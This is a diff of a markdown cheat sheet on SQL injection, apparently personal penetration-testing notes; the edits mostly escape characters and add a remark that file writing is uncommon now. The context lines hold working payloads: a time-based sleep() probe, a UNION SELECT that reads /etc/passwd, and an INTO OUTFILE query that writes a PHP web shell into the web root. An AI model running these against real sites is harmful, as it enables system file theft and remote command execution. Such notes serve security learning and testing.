Reboare/security/sql-injections.md

 http://example.com/photoalbum.php?id=1-sleep(4)
 ```

-If it lods for four seconds exta we know that the database is processing our sleep() command.
+If it lods for four seconds exta we know that the database is processing our sleep\(\) command.

 ### Get shell from sql-injection

 The good part about mysql from a hacker-perspective is that you can actaully use slq to write files to the system.
 The will let us write a backdoor to the system that we can use.
+This is very uncommon nowadays however

 #### Load files

-UNION SELECT 1, load_file(/etc/passwd) #
+UNION SELECT 1, load\_file\(/etc/passwd\) \#

 ```
 http://example.com/photoalbum.php?id=1 union all select 1,2,3,4,"<?php echo
 shell_exec($_GET['cmd']);?>",6,7,8,9 into OUTFILE 'c:/xampp/htdocs/cmd.php'
 ```

 #### Write files

 ```